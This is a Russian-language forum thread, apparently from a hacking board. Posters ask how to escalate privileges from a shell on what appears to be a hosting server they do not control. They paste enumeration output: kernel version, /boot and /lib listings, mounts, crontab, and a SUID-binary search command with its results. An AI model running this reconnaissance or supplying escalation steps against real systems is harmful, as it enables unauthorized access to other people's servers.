FreeBSD 9.2-RELEASE-p5

На системе сделано так, что файл /etc/hosts различается. Даже /etc/passwd

Возможно ли повысить права на шелле?

total 3025
drwxr-xr-x 9 root wheel 43 Apr 30 2014 .
drwxr-xr-x 18 root wheel 24 Nov 20 16:41 ..
drwxr-xr-x 2 root wheel 686 Apr 30 2014 GENERIC
-r--r--r-- 1 root wheel 12264 Feb 1 2014 beastie.4th
-r--r--r-- 1 root wheel 8192 Feb 1 2014 boot
-r--r--r-- 1 root wheel 512 Jan 9 2013 boot0
-r--r--r-- 1 root wheel 512 Jan 9 2013 boot0sio
-r--r--r-- 1 root wheel 512 Jan 9 2013 boot1
-r--r--r-- 1 root wheel 7680 Feb 1 2014 boot2
-r--r--r-- 1 root wheel 2940 Feb 1 2014 brand.4th
-r--r--r-- 1 root wheel 1185 Jan 9 2013 cdboot
-r--r--r-- 1 root wheel 5667 Feb 1 2014 check-password.4th
-r--r--r-- 1 root wheel 1872 Feb 1 2014 color.4th
drwxr-xr-x 2 root wheel 3 Feb 1 2014 defaults
-r--r--r-- 1 root wheel 3917 Feb 1 2014 delay.4th
-r--r--r-- 1 root wheel 791 Feb 1 2014 device.hints
drwxr-xr-x 2 root wheel 2 Jan 16 2012 firmware
-r--r--r-- 1 root wheel 2623 Feb 1 2014 frames.4th
-r--r--r-- 1 root wheel 15443 Feb 1 2014 gptboot
-r--r--r-- 1 root wheel 41923 Feb 1 2014 gptzfsboot
drwxr-xr-x 2 root wheel 667 Apr 30 2014 kernel
drwxr-xr-x 2 root wheel 3 Apr 30 2014 kernel.old
-r-xr-xr-x 1 root wheel 229376 Feb 1 2014 loader
-r--r--r-- 1 root wheel 5884 Feb 1 2014 loader.4th
-rw-r--r-- 1 root wheel 870 Jul 20 2017 loader.conf
-r--r--r-- 1 root wheel 14766 Jan 9 2013 loader.help
-r--r--r-- 1 root wheel 393 Feb 1 2014 loader.rc
-r--r--r-- 1 root wheel 512 Jan 9 2013 mbr
-r--r--r-- 1 root wheel 7000 Feb 1 2014 menu-commands.4th
-r--r--r-- 1 root wheel 30264 Feb 1 2014 menu.4th
-r--r--r-- 1 root wheel 4167 Feb 1 2014 menu.rc
-r--r--r-- 1 root wheel 18231 Feb 1 2014 menusets.4th
drwxr-xr-x 2 root wheel 2 Jan 16 2012 modules
-r--r--r-- 1 root wheel 512 Feb 1 2014 pmbr
-r--r--r-- 1 root wheel 231424 Feb 1 2014 pxeboot
-r--r--r-- 1 root wheel 700 Feb 1 2014 screen.4th
-r--r--r-- 1 root wheel 2618 Feb 1 2014 shortcuts.4th
-r--r--r-- 1 root wheel 35601 Feb 1 2014 support.4th
-r--r--r-- 1 root wheel 250284 Feb 1 2014 userboot.so
-r--r--r-- 1 root wheel 2883 Feb 1 2014 version.4th
drwxr-xr-x 2 root wheel 3 Oct 22 2018 zfs
-r--r--r-- 1 root wheel 66048 Feb 1 2014 zfsboot
-r-xr-xr-x 1 root wheel 266240 Feb 1 2014 zfsloader

UN77H92ZE1

06.05.2020, 16:10

Приветствую. Подскажите, кому не трудно, что можно сделать, куда копнуть. Ничего дельного найти не смог в силу мизерного опыта. Буду благодарен за любую помощь.

.SpoilerTarget" type="button">Spoiler: uname -a
Linux ***.**.**.*** 4.15.0-76-generic #86~16.04.1-Ubuntu SMP Mon Jan 20 11:02:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

.SpoilerTarget" type="button">Spoiler: ls -la /boot
total 840124

drwxr-xr-x 3 root root 4096 Apr 21 06:55 .

drwxr-xr-x 27 root root 4096 May 6 14:43 ..

-rw------- 1 root root 4049376 Feb 12 2019 System.map-4.15.0-46-generic

-rw------- 1 root root 4049889 Mar 15 2019 System.map-4.15.0-47-generic

-rw------- 1 root root 4051368 Apr 5 2019 System.map-4.15.0-48-generic

-rw-r----- 1 root root 4052501 May 8 2019 System.map-4.15.0-50-generic

-rw------- 1 root root 4050792 May 16 2019 System.map-4.15.0-51-generic

-rw------- 1 root root 4050825 Jun 6 2019 System.map-4.15.0-52-generic

-rw------- 1 root root 4050903 Jun 24 2019 System.map-4.15.0-54-generic

-rw------- 1 root root 4054631 Aug 7 2019 System.map-4.15.0-58-generic

-rw------- 1 root root 4061501 Aug 26 2019 System.map-4.15.0-60-generic

-rw------- 1 root root 4061501 Sep 6 2019 System.map-4.15.0-62-generic

-rw------- 1 root root 4061501 Sep 13 2019 System.map-4.15.0-64-generic

-rw------- 1 root root 4062077 Sep 18 2019 System.map-4.15.0-65-generic

-rw------- 1 root root 4062584 Oct 1 2019 System.map-4.15.0-66-generic

-rw------- 1 root root 4064065 Nov 12 18:23 System.map-4.15.0-70-generic

-rw------- 1 root root 4064436 Nov 26 22:04 System.map-4.15.0-72-generic

-rw-r----- 1 root root 4066237 Dec 18 09:15 System.map-4.15.0-74-generic

-rw-r----- 1 root root 4066237 Jan 20 15:23 System.map-4.15.0-76-generic

-rw------- 1 root root 4067466 Feb 12 08:35 System.map-4.15.0-88-generic

-rw------- 1 root root 4067536 Feb 28 20:24 System.map-4.15.0-91-generic

-rw------- 1 root root 4068326 Apr 1 08:44 System.map-4.15.0-96-generic

-rw-r----- 1 root root 3841523 Jan 5 2018 System.map-4.9.75-timeweb

-rw-r--r-- 1 root root 217004 Feb 12 2019 config-4.15.0-46-generic

-rw-r--r-- 1 root root 217004 Mar 15 2019 config-4.15.0-47-generic

-rw-r--r-- 1 root root 217286 Apr 5 2019 config-4.15.0-48-generic

-rw-r--r-- 1 root root 217286 May 8 2019 config-4.15.0-50-generic

-rw-r--r-- 1 root root 217286 May 16 2019 config-4.15.0-51-generic

-rw-r--r-- 1 root root 217286 Jun 6 2019 config-4.15.0-52-generic

-rw-r--r-- 1 root root 217286 Jun 24 2019 config-4.15.0-54-generic

-rw-r--r-- 1 root root 217262 Aug 7 2019 config-4.15.0-58-generic

-rw-r--r-- 1 root root 217381 Aug 26 2019 config-4.15.0-60-generic

-rw-r--r-- 1 root root 217381 Sep 6 2019 config-4.15.0-62-generic

-rw-r--r-- 1 root root 217381 Sep 13 2019 config-4.15.0-64-generic

-rw-r--r-- 1 root root 217370 Sep 18 2019 config-4.15.0-65-generic

-rw-r--r-- 1 root root 217370 Oct 1 2019 config-4.15.0-66-generic

-rw-r--r-- 1 root root 217488 Nov 12 18:23 config-4.15.0-70-generic

-rw-r--r-- 1 root root 217468 Nov 26 22:04 config-4.15.0-72-generic

-rw-r--r-- 1 root root 217503 Dec 18 09:15 config-4.15.0-74-generic

-rw-r--r-- 1 root root 217503 Jan 20 15:23 config-4.15.0-76-generic

-rw-r--r-- 1 root root 217503 Feb 12 08:35 config-4.15.0-88-generic

-rw-r--r-- 1 root root 217465 Feb 28 20:24 config-4.15.0-91-generic

-rw-r--r-- 1 root root 217465 Apr 1 08:44 config-4.15.0-96-generic

-rw-r--r-- 1 root root 163824 Jan 5 2018 config-4.9.75-timeweb

-rw-r--r-- 1 root root 163824 Jan 5 2018 config-4.9.75-timeweb.old

drwxr-xr-x 5 root root 12288 Apr 21 06:55 grub

-rw-r--r-- 1 root root 38087263 May 15 2019 initrd.img-4.15.0-50-generic

-rw-r--r-- 1 root root 38087364 Jun 21 2019 initrd.img-4.15.0-52-generic

-rw-r--r-- 1 root root 38080526 Jul 3 2019 initrd.img-4.15.0-54-generic

-rw-r--r-- 1 root root 38084498 Sep 3 2019 initrd.img-4.15.0-58-generic

-rw-r--r-- 1 root root 38091332 Sep 6 2019 initrd.img-4.15.0-60-generic

-rw-r--r-- 1 root root 38092722 Sep 15 2019 initrd.img-4.15.0-62-generic

-rw-r--r-- 1 root root 38091156 Sep 20 2019 initrd.img-4.15.0-64-generic

-rw-r--r-- 1 root root 38092258 Oct 3 2019 initrd.img-4.15.0-65-generic

-rw-r--r-- 1 root root 38093333 Oct 23 2019 initrd.img-4.15.0-66-generic

-rw-r--r-- 1 root root 38103191 Nov 20 06:47 initrd.img-4.15.0-70-generic

-rw-r--r-- 1 root root 38100730 Dec 11 06:42 initrd.img-4.15.0-72-generic

-rw-r--r-- 1 root root 38108528 Jan 16 07:11 initrd.img-4.15.0-74-generic

-rw-r--r-- 1 root root 38109016 Feb 5 07:06 initrd.img-4.15.0-76-generic

-rw-r--r-- 1 root root 38110808 Feb 26 07:03 initrd.img-4.15.0-88-generic

-rw-r--r-- 1 root root 38115311 Mar 26 07:15 initrd.img-4.15.0-91-generic

-rw-r--r-- 1 root root 38116820 Apr 21 06:55 initrd.img-4.15.0-96-generic

-rw-r--r-- 1 root root 22714999 Jan 10 2018 initrd.img-4.9.75-timeweb

-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin

-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf

-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin

-rw------- 1 root root 8141336 May 14 2019 vmlinuz-4.15.0-50-generic

-rw------- 1 root root 8141080 Jun 17 2019 vmlinuz-4.15.0-52-generic

-rw------- 1 root root 8140856 Jun 25 2019 vmlinuz-4.15.0-54-generic

-rw------- 1 root root 8148696 Aug 8 2019 vmlinuz-4.15.0-58-generic

-rw------- 1 root root 8173112 Aug 26 2019 vmlinuz-4.15.0-60-generic

-rw------- 1 root root 8172440 Sep 6 2019 vmlinuz-4.15.0-62-generic

-rw------- 1 root root 8172440 Sep 17 2019 vmlinuz-4.15.0-64-generic

-rw------- 1 root root 8181016 Sep 19 2019 vmlinuz-4.15.0-65-generic

-rw------- 1 root root 8181656 Oct 3 2019 vmlinuz-4.15.0-66-generic

-rw------- 1 root root 8184600 Nov 13 10:24 vmlinuz-4.15.0-70-generic

-rw------- 1 root root 8185592 Nov 27 12:18 vmlinuz-4.15.0-72-generic

-rw------- 1 root root 8187192 Dec 19 14:43 vmlinuz-4.15.0-74-generic

-rw------- 1 root root 8187320 Jan 21 18:48 vmlinuz-4.15.0-76-generic

-rw------- 1 root root 8193496 Feb 12 16:28 vmlinuz-4.15.0-88-generic

-rw------- 1 root root 8193432 Mar 1 13:28 vmlinuz-4.15.0-91-generic

-rw------- 1 root root 8191544 Apr 6 19:08 vmlinuz-4.15.0-96-generic

-rw-r--r-- 1 root root 6761232 Jan 5 2018 vmlinuz-4.9.75-timeweb

.SpoilerTarget" type="button">Spoiler: ls -la --full-time /lib
total 332

drwxr-xr-x 21 root root 4096 2019-03-20 06:39:13.338937021 +0300 .

drwxr-xr-x 27 root root 4096 2020-05-06 14:52:50.318163636 +0300 ..

lrwxrwxrwx 1 root root 21 2016-02-16 13:18:42.115126992 +0300 cpp -> /etc/alternatives/cpp

drwxr-xr-x 3 root root 4096 2019-03-20 06:39:13.478937018 +0300 crda

drwxr-xr-x 2 root root 4096 2017-02-21 03:33:36.203966177 +0300 discover

drwxr-xr-x 2 root root 4096 2017-02-21 03:34:26.419965014 +0300 drbd

drwxr-xr-x 72 root root 32768 2019-07-20 13:16:38.864405916 +0300 firmware

drwxr-xr-x 2 root root 4096 2017-02-21 03:30:18.631970753 +0300 hdparm

drwxr-xr-x 2 root root 4096 2018-07-05 06:45:20.437203377 +0300 ifupdown

drwxr-xr-x 2 root root 4096 2019-01-16 06:49:08.667034612 +0300 init

-rwxr-xr-x 1 root root 71528 2017-06-13 18:47:43.000000000 +0300 klibc-gLiulUM5C1Zpwc25rCxX8UZ6S-s.so

lrwxrwxrwx 1 root root 17 2014-01-09 02:32:00.000000000 +0400 libip4tc.so.0 -> libip4tc.so.0.1.0

-rw-r--r-- 1 root root 27392 2014-01-09 02:32:05.000000000 +0400 libip4tc.so.0.1.0

lrwxrwxrwx 1 root root 17 2014-01-09 02:32:00.000000000 +0400 libip6tc.so.0 -> libip6tc.so.0.1.0

-rw-r--r-- 1 root root 31520 2014-01-09 02:32:05.000000000 +0400 libip6tc.so.0.1.0

lrwxrwxrwx 1 root root 16 2014-01-09 02:32:00.000000000 +0400 libiptc.so.0 -> libiptc.so.0.0.0

-rw-r--r-- 1 root root 5816 2014-01-09 02:32:05.000000000 +0400 libiptc.so.0.0.0

lrwxrwxrwx 1 root root 20 2014-01-09 02:32:00.000000000 +0400 libxtables.so.10 -> libxtables.so.10.0.0

-rw-r--r-- 1 root root 47712 2014-01-09 02:32:06.000000000 +0400 libxtables.so.10.0.0

drwxr-xr-x 3 root root 4096 2017-02-21 03:29:05.103972456 +0300 lsb

drwxr-xr-x 2 root root 4096 2020-04-21 06:54:38.683867507 +0300 modprobe.d

drwxr-xr-x 24 root root 4096 2020-04-21 06:54:37.623867532 +0300 modules

drwxr-xr-x 2 root root 4096 2017-02-21 03:32:07.783968225 +0300 modules-load.d

drwxr-xr-x 3 root root 4096 2018-05-30 06:25:18.758465321 +0300 plymouth

drwxr-xr-x 3 root root 4096 2016-02-16 13:17:51.699128162 +0300 recovery-mode

drwxr-xr-x 3 root root 4096 2019-04-12 07:07:29.311777451 +0300 systemd

drwxr-xr-x 15 root root 4096 2016-02-16 13:01:39.123150686 +0300 terminfo

drwxr-xr-x 4 root root 4096 2019-04-12 07:07:52.995928901 +0300 udev

drwxr-xr-x 2 root root 4096 2017-02-21 03:33:25.463966426 +0300 ufw

drwxr-xr-x 4 root root 16384 2019-04-12 07:07:29.515675446 +0300 x86_64-linux-gnu

drwxr-xr-x 2 root root 20480 2017-02-21 03:33:22.667966491 +0300 xtables

.SpoilerTarget" type="button">Spoiler: mount
/dev/sda1 on / type ext4 (rw,noatime,discard)

proc on /proc type proc (rw,noexec,nosuid,nodev,hidepid=1)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

none on /sys/fs/cgroup type tmpfs (rw)

none on /sys/fs/fuse/connections type fusectl (rw)

none on /sys/kernel/debug type debugfs (rw)

none on /sys/kernel/security type securityfs (rw)

udev on /dev type devtmpfs (rw,mode=0755)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)

none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g)

tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)

none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)

shm on /run/shm type tmpfs (rw,nosuid,nodev,size=1g)

none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)

none on /sys/fs/pstore type pstore (rw)

none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g)

systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,relatime,name=systemd)

/dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.use r,jqfmt=vfsv0,usrquota,discard,_netdev)

/tmp on /var/tmp type none (rw,bind,_netdev)

/tmp on /var/tmp type none (rw,bind,_netdev)

none on /run/shm type tmpfs (rw,nosuid,nodev,size=1g)

//***.**.**.***/on_demand on /mnt/on_demand_storage-cs3-old type cifs (ro,noexec,nosuid,nodev)

//***.**.**.***/homes on /mnt/backup type cifs (ro,noexec,nosuid,nodev)

//***.**.**.***/on_demand on /mnt/on_demand_storage-cs2 type cifs (ro,noexec,nosuid,nodev)

//***.**.**.***/on_demand on /mnt/on_demand_storage-cs1 type cifs (ro,noexec,nosuid,nodev)

.SpoilerTarget" type="button">Spoiler: df -h
Filesystem Size Used Avail Use% Mounted on

/dev/sda1 46G 33G 11G 76% /

none 4.0K 0 4.0K 0% /sys/fs/cgroup

udev 32G 12K 32G 1% /dev

/tmp 4.0G 400M 3.7G 10% /var/tmp

tmpfs 6.3G 872K 6.3G 1% /run

none 5.0M 4.0K 5.0M 1% /run/lock

shm 1.0G 36K 1.0G 1% /run/shm

none 100M 8.0K 100M 1% /run/user

none 1.0G 736K 1.0G 1% /var/spool/exim4

/dev/drbd0 1.3T 1.3T 38G 98% /home

none 1.0G 36K 1.0G 1% /run/shm

.SpoilerTarget" type="button">Spoiler: cat /etc/issue
Ubuntu 14.04.6 LTS \n \l

.SpoilerTarget" type="button">Spoiler: cat /etc/crontab
# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

#

.SpoilerTarget" type="button">Spoiler: cat /proc/version
Linux version 4.15.0-76-generic (buildd@lgw01-amd64-023) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #86~16.04.1-Ubuntu SMP Mon Jan 20 11:02:50 UTC 2020

.SpoilerTarget" type="button">Spoiler: find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 30800 May 15 2015 /bin/fusermount

-rwsr-xr-x 1 root root 94792 Nov 24 2016 /bin/mount

-rwsr-xr-x 1 root root 69120 Nov 24 2016 /bin/umount

-rwsr-xr-x 1 root root 36936 May 17 2017 /bin/su

-rwsr-xr-x 1 root root 36592 May 17 2017 /usr/bin/newgrp

-rwsr-xr-x 1 root root 75256 Oct 21 2013 /usr/bin/mtr

-rwsr-xr-x 1 root root 23104 Mar 15 2014 /usr/bin/traceroute6.iputils

-rwsr-xr-x 1 root root 46424 May 17 2017 /usr/bin/chfn

-rwsr-sr-x 1 daemon daemon 51464 Oct 21 2013 /usr/bin/at

-rwsr-xr-x 1 root root 35712 Nov 8 2009 /usr/bin/tcptraceroute.mt

-rwsr-xr-x 1 root root 23304 Mar 27 2019 /usr/bin/pkexec

-rwsr-xr-x 1 root root 41336 May 17 2017 /usr/bin/chsh

-rwsr-xr-x 1 root root 72280 May 17 2017 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 47032 May 17 2017 /usr/bin/passwd

-rwsr-xr-x 1 root root 155008 May 29 2017 /usr/bin/sudo

-rwsr-sr-x 1 libuuid libuuid 18904 Nov 24 2016 /usr/sbin/uuidd

-r-sr-x--- 1 root customers 983424 Feb 10 2018 /usr/sbin/exim4

-rwsr-xr-- 1 root dip 347296 Jun 12 2018 /usr/sbin/pppd

-rwsr-xr-x 1 root root 440416 Mar 4 2019 /usr/lib/openssh/ssh-keysign

-rwsr-xr-- 1 root messagebus 310800 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 10240 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device

-rwsr-xr-x 1 root root 14808 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1

-rwsr-xr-x 1 root root 35608 Jun 28 2013 /sbin/mount.cifs